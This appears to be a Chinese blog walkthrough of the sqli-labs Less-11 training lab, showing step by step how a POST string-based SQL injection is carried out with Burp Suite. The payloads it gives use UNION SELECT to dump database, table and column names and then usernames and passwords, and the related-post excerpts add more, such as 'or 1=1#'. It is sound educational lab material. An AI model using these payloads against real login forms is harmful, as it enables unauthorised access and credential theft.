sqli-labs less11 POST注入-字符型

最新推荐文章于 2022-06-30 12:59:14 发布
最新推荐文章于 2022-06-30 12:59:14 发布
阅读量945 收藏 1
点赞数
分类专栏: 网络安全 文章标签: sql注入 sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/123683002
版权

sqli-labs less11 POST注入

在这里插入图片描述

注入工具:burp

(1)判断类型:
burp抓包,看到传参admin,是可以正常显示的:
在这里插入图片描述

and 1 = 1
在这里插入图片描述
异常,估计不是数字型

尝试单引号:
在这里插入图片描述

报错了,好征兆

and 1=1 --+

在这里插入图片描述

and 1 = 2 --+

在这里插入图片描述

由此,断定这个字符型 的闭合就是’

(2)判断字段个数:
在这里插入图片描述

order by 1回显正常
在这里插入图片描述

order by 2回显正常
在这里插入图片描述

order by 3回显错误

判断字段个数是2个

(3)判断回显位置:
在这里插入图片描述

显然,两个回显位置都可以

(4)爆数据库名:
uname=-1 ’ union select 1,database() --+ &passwd=admin&submit=Submit
在这里插入图片描述

数据库名:security

(5)数据表名:
uname=-1 ’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit
在这里插入图片描述
数据表名:
emails,referers,uagents,users

(6)挑选数据表users进行查询:
uname=-1 ’ union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’ --+ &passwd=admin&submit=Submit
在这里插入图片描述

查询到字段:
id,username,password

(7)爆数据:

uname=-1 ’ union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit

在这里插入图片描述

qq_51550750
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数字字符POST注入
m0_64338210的博客
02-17 337
实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-11/ 2.利用Burpsuite 工具抓包 (1)启动Burp
SQLi-LABS】Less -11 注入思路以及过程
m0_52513952的博客
02-22 3180
less 11 是 sqli-labs 的第一道 POST 注入题,因此,我们不能再用之前 GET 注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
sqli-labs Less11 POST注入
m0_63711447的博客
04-14 548
POST注入,不能直接在地址栏构造payload,通过bp或者hackbar构造payload 1、先抓包查看传参方式和传参数据 2、闭合测试 在admin后加一个单引号重新发包,出现报错,可知是单引号闭合方式 用万能密码'or 1=1#试试 3、使用order by语句判断有几列 order by3报错,order by2回显正常,所有有两个回显位 4、查库,得到当前数据库为security uname=1admin' union select 1,databa..
基于SQLI的POST字符SQL注入
qq_44060093的博客
08-21 359
实验原理 1.POST方式概述   使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于获取数据,post用于提交数据。 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制 3.如何判断是否存在POST注入 主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),
【less-11】基于SQLI的POST字符SQL注入
未名编程
07-17 538
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POSTSQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
POST注入
qq_45031509的博客
04-15 2665
POST注入 ①除了在url中体提交,也可以在网页输入上提交,如果需要与数据库连接的话就可能会存在注入,数据需要抓包才能看见。 ② 产生的地方,多半出现在登录框,查询框,等各种和数据库有交互的框数据。 ③提交方式,与参数类(单引号,双引号的干扰) 案列(实验环境,SQlilabs 十一关) 1)抓包结果可以看出,账户,密码的提交方式,猜测可能有注入点 2)判断注入字符注入 3)猜测字段数为2 4)联合查询,查询数据库名与数据库用户 SELECT username, password FR
Sqli-labs——lesson11
weixin_62281892的博客
06-30 806
lesson11
使用burpsuit工具进行sql盲注入
m0_37570494的博客
01-25 2216
burpsuit抓包,改包工具,可以通过修改所抓取的url请求信息,来达到sql注入的目的: 1、选择要盲注的url进行burp抓包: 2、注入的内容用ASCII()函数进行转换成对应的ASCII值,才能进行此处的数字破解,类为numebers,0-127范围内,步长为1,此为burpsuit里面一个模块,用于密码破解使用: 3、不断修改substr()函数中数字位置,执行burp的attack,观察结果不一样的地方,此时ascii值为100,找到对应的值,也就是,当找到密码时,此处请求返.
redistemplate注入为null_「Burpsuite练兵场」SQL注入及相关实验(一)
weixin_39806779的博客
11-20 201
说到SQL注入漏洞,各位小伙伴一定是耳熟能详,作为一种常见的高危漏洞,其对于应用程序的损害是非常严重的。因此这也是一个在渗透测试的过程中具有高优先级的验证目标,所以将与之相关的实验进行优先讲述。本文是 i 春秋论坛作家「dll_s」表哥原创的Burpsuite练兵场系列文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。SQL注入原理:SQL注入的原理其实并不难理解,Web应用程...
通过sqli-labs学习sql注入——基础挑战之less11-22
热门推荐
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get的,包含的种类也是比较多了,这次的是post注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
使用 Burpsuite 进行POST 方式的SQL注入
枫梓林のBlog
04-25 7947
使用 Burpsuite 进行POST 方式的SQL注入 文章目录使用 Burpsuite 进行POST 方式的SQL注入0x01 Burpsuite介绍1.打开浏览器设置代理2.打开 burp suite0x02 POST 方式注入1.打开 Less-11页面0x03 POST 方式的盲注1.POST 方式的布尔盲注1.1 Less-152.POST 方式的时间盲注0x04 HTTP 头的注入方式1.HTTP 头注入原理2. HTTP User-Agent 注入Less-183.HTTP Referer
【SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 4792
1. 了解user-agent注入点; 2. 掌握user-agent注入的方法。
分包合同计量单.docx
最新发布
07-13
分包合同计量单.docx
树莓派简介PPT课件.ppt
07-13
树莓派简介PPT课件.ppt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值